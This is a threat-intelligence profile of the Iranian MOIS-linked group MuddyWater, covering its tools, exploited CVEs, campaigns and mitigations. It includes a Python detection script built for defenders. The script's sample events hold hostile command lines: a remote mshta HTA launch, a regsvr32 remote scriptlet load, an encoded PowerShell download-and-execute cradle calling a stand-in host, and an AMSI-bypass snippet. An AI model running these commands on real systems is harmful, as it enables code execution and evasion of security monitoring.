MuddyWater
Iranian Ministry of Intelligence and Security (MOIS)
🇮🇷 Iran | Nation-State | Active | G0069
Key Intelligence
MITRE ID: G0069
Country: 🇮🇷 Iran
Motivation: Espionage, Surveillance
Active Since: 2017
Last Seen: 2025
Techniques: 23 across 11 tactics
Attribution: Iranian Ministry of Intelligence and Security (MOIS)
Also Known As: MERCURY, Mango Sandstorm, Static Kitten, Seedworm, TEMP.Zagros, TA450, Earth Vetala, ATK51, Yellow Nix
Target Profile
Targeted Industries: Government, Telecommunications, Defense, Oil & Gas, Media
Targeted Countries: 🇹🇷 Turkey, 🇵🇰 Pakistan, 🇦🇪 UAE, 🇮🇱 Israel, 🇮🇶 Iraq, 🇸🇦 Saudi Arabia

Overview

MuddyWater is an Iranian state-sponsored group linked to MOIS that conducts espionage operations primarily against Middle Eastern, Central Asian, and Western government and telecommunications organizations. It is known for heavy use of legitimate remote-management tools such as Atera, ScreenConnect, and SimpleHelp for remote access, which makes detection difficult. The group frequently uses living-off-the-land techniques and spearphishing with macro-enabled documents.

Tools & Malware

MuddyC2Go, PhonyC2, POWERSTATS, PowGoop, Small Sieve, MuddyC3, Atera Agent, ScreenConnect, SimpleHelp, ScreenConnect (abused), LaZagne, Mimikatz, Atera

Malware & Tool Details

Arsenal attributed to MuddyWater.

Attack Path POWERSTATS / RMM Tool Abuse (2022-2024)

Following MITRE ATT&CK Flow methodology.

Attack flow: POWERSTATS / RMM Tool Abuse (2022-2024), 8 steps.

Diamond Model

Caltagirone, Pendergast & Betz (2013)
ADVERSARY
MOIS, overlaps with OilRig operators
CAPABILITY
POWERSTATS, MuddyC2Go, PhonyC2, PowGoop, Small Sieve, LaZagne, RMM tools
INFRASTRUCTURE
Legitimate RMM platforms (ScreenConnect, Atera, SimpleHelp), compromised webmail
VICTIM
Turkey, Pakistan, UAE, Iraq, Israel, Saudi Arabia — gov, telecom, defense, oil & gas

ATT&CK Navigator

Interactive MITRE ATT&CK Navigator layer for MuddyWater (G0069).


Known CVEs Exploited

CVE | Year | Description
CVE-2021-44228 | 2021 | Log4Shell for access against Israeli targets
CVE-2021-26855 | 2021 | ProxyLogon for Exchange web shells

Notable Campaigns

2024
SimpleHelp Abuse
Large-scale abuse of legitimate remote management tools for persistent access.
2022
PhonyC2 Deployment
Development and deployment of custom C2 framework replacing older tools.
2021
Log4j Exploitation
Rapid adoption of Log4j vulnerabilities for initial access against Israeli targets.
2018
POWERSTATS Campaign
Targeting of government organizations in the Middle East with custom PowerShell backdoor.

Detection Engineering

RMM Tool Abuse Detection
Maintain an inventory of approved RMM tools. Alert on installation of ScreenConnect, Atera, SimpleHelp, AnyDesk, or TeamViewer if not approved for that endpoint. Monitor for RMM agent communication to unexpected tenant IDs or account identifiers.
LOLBIN Execution Monitoring
Monitor mshta.exe executing remote HTA files from URLs. Detect regsvr32.exe loading remote SCT files via /s /u /i:URL patterns. Alert on rundll32.exe with unusual command-line arguments. Enable Windows ASR rules for LOLBIN restriction.
PowerShell Obfuscation Detection
Enable Script Block Logging (Event ID 4104). Detect Base64-encoded commands, string concatenation obfuscation (-join, [char] casting), and Invoke-Expression (IEX) with downloaded content. Monitor for AMSI bypass attempts.
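The LOLBIN and PowerShell obfuscation indicators described in the two entries above can be checked with a small rule pass over endpoint telemetry. The following is an added example written for this page, not a rule from CISA, MITRE, or any vendor: it runs over constructed sample events (process-creation command lines and Event ID 4104 script-block bodies, using the reserved example.invalid domain) and reports mshta remote HTA launches, regsvr32 /s /u /i:URL scriptlet loads, -EncodedCommand payloads (decoded from UTF-16LE Base64 and re-scanned), -join and [char] string building, IEX download cradles, and the well-known AmsiUtils/amsiInitFailed bypass strings. The rundll32 "unusual arguments" case is left out because its baseline is environment-specific.

```python
"""Rule pass for MuddyWater-style LOLBIN and PowerShell obfuscation
indicators. Added example; events below are constructed, not real captures."""
import base64
import re

# Constructed sample telemetry: process-creation events carry "image" and
# "cmdline"; Script Block Logging (Event ID 4104) events carry "script".
SAMPLE_EVENTS = [
    {"id": 1, "source": "process", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"id": 2, "source": "process", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /i:https://example.invalid/x.sct scrobj.dll"},
    {"id": 3, "source": "process", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s C:\\Windows\\System32\\vbscript.dll"},
    {"id": 4, "source": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
         .encode("utf-16le")).decode("ascii")},
    {"id": 5, "source": "4104",
     "script": "$s = ('I','E','X') -join ''; $c = [char]73 + [char]69 + [char]88"},
    {"id": 6, "source": "4104",
     "script": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
               ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 7, "source": "4104",
     "script": "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Longest alias first so "-enc" is not consumed as "-e" followed by "nc".
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def lolbin_findings(image, cmdline):
    """Flag mshta pulling a remote HTA and regsvr32 loading a remote scriptlet."""
    findings = []
    img = image.lower()
    if img == "mshta.exe" and URL_RE.search(cmdline):
        findings.append("mshta_remote_hta")
    if (img == "regsvr32.exe"
            and re.search(r"/i:https?://", cmdline, re.IGNORECASE)
            and re.search(r"/u\b", cmdline, re.IGNORECASE)):
        findings.append("regsvr32_remote_sct")
    return findings


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid.
    PowerShell encodes the script as UTF-16LE before Base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_findings(script):
    """Flag obfuscation and bypass patterns in a PowerShell script body."""
    findings = []
    if (re.search(r"\bIEX\b|Invoke-Expression", script, re.IGNORECASE)
            and re.search(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b",
                          script, re.IGNORECASE)):
        findings.append("iex_download_cradle")
    if re.search(r"-join\b", script, re.IGNORECASE):
        findings.append("join_obfuscation")
    if re.search(r"\[char\]\s*\d+", script, re.IGNORECASE):
        findings.append("char_cast_obfuscation")
    if re.search(r"AmsiUtils|amsiInitFailed", script, re.IGNORECASE):
        findings.append("amsi_bypass_indicator")
    return findings


def analyze(events):
    """Return [(event_id, [finding, ...]), ...] for events that trip a rule."""
    alerts = []
    for ev in events:
        findings = []
        if ev["source"] == "process":
            findings += lolbin_findings(ev["image"], ev["cmdline"])
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                # Decode and re-scan so encoding alone does not hide the cradle.
                findings.append("encoded_command")
                findings += powershell_findings(decoded)
        elif ev["source"] == "4104":
            findings += powershell_findings(ev["script"])
        if findings:
            alerts.append((ev["id"], findings))
    return alerts


if __name__ == "__main__":
    for event_id, findings in analyze(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(findings)}")
```

Events 3 and 7 (a local DLL registration and an ordinary file listing) produce no findings, which is the baseline a rule like this has to preserve; in production the regsvr32 and mshta checks should be scoped with the ASR rules named in the recommendations below rather than relied on alone.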

Related Threat Actors

Documented in MITRE ATT&CK, vendor intelligence, and government advisories.

Defense Recommendations

Mitigations with MITRE ATT&CK IDs and source references.

Block unauthorized RMM tools (ScreenConnect, Atera, SimpleHelp). MuddyWater uses legitimate RMM for persistence.
CISA AA22-055A
Deploy ASR rules blocking LOLBIN abuse (mshta.exe, regsvr32.exe, rundll32.exe).
Microsoft ASR
Enable PowerShell CLM and Script Block Logging. MuddyWater uses obfuscated PowerShell heavily.
NSA/CISA PowerShell Guide
Block macros from internet via MOTW enforcement.
Microsoft Macro Policy

Attribution Confidence

Attribution Confidence: High
Evidence Supporting Attribution
US Cyber Command attributes to Iranian MOIS
https://www.cybercom.mil/Media/News/Article/2897570/iranian-
Multiple vendor attributions (Cisco Talos, Trend Micro)
https://blog.talosintelligence.com/2022/01/iranian-apt-muddy

Threat Assessment

Capability: 6/10
Intent: 8/10
Targeting: 7/10
Overall Threat Level: Moderate
Iranian MOIS-affiliated actor notable for abusing legitimate RMM tools and living-off-the-land techniques. Broad Middle East targeting.

Legal Actions & Sanctions

Emulation Plans & Guidance

Plan | Source | Type | Description
CISA AA22-055A MuddyWater Advisory | CISA | Guide | Iranian MOIS advisory with MuddyWater TTPs and detection guidance
Deep Instinct MuddyC2Go Analysis | Deep Instinct | Guide | Technical analysis of MuddyC2Go framework
Deep Instinct: PhonyC2 Framework | Deep Instinct | Guide | Technical analysis of PhonyC2 C2 framework with detection and emulation guidance

Page Contributors

Adversary Village
MITRE ATT&CK Team
BreachSimRange